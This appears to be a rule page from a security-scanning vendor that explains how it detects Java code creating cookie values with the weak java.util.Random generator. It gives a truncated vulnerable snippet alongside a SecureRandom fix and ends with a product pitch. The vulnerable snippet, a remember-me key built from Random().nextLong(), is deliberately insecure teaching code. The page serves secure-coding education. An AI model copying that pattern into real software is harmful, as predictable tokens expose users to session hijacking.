Java Weak Random Seed
Description
Detects the use of weak random number generators when generating cookie values in Java applications. Using predictable random numbers for cookies can allow attackers to guess or predict session identifiers and other sensitive cookie values, potentially leading to session hijacking attacks.
Detection Strategy
• Identifies calls to addCookie() method in Java code
• Examines the cookie value generation to check if it uses weak random number generators (like java.util.Random)
• Reports a vulnerability when cookies are created using weak random number generation methods instead of secure alternatives like SecureRandom
• Specifically looks at the object and arguments used in the addCookie call to determine if weak randomization is used
Vulnerable code example
import javax.servlet.http.HttpServletRequest;
import java.util.Random;
public class VulnerableRandomExample {
public void doPost(HttpServletRequest request) {
// Vulnerable: Using java.util.Random() for security-sensitive token generation
long randomValue = new Random().nextLong();
String rememberMeKey = Long.toString(randomValue);...✅ Secure code example
import javax.servlet.http.HttpServletRequest;
import java.security.SecureRandom; // Using SecureRandom instead of Random
import java.util.Base64;
public class SecureRandomExample {
private final SecureRandom secureRandom = new SecureRandom(); // Create single instance for reuse
public void doPost(HttpServletRequest request) {...Search for vulnerabilities in your apps for free with Fluid Attacks' automated security testing! Start your 21-day free trial and discover the benefits of the Continuous Hacking Essential plan. If you prefer the Advanced plan, which includes the expertise of Fluid Attacks' hacking team, fill out this contact form.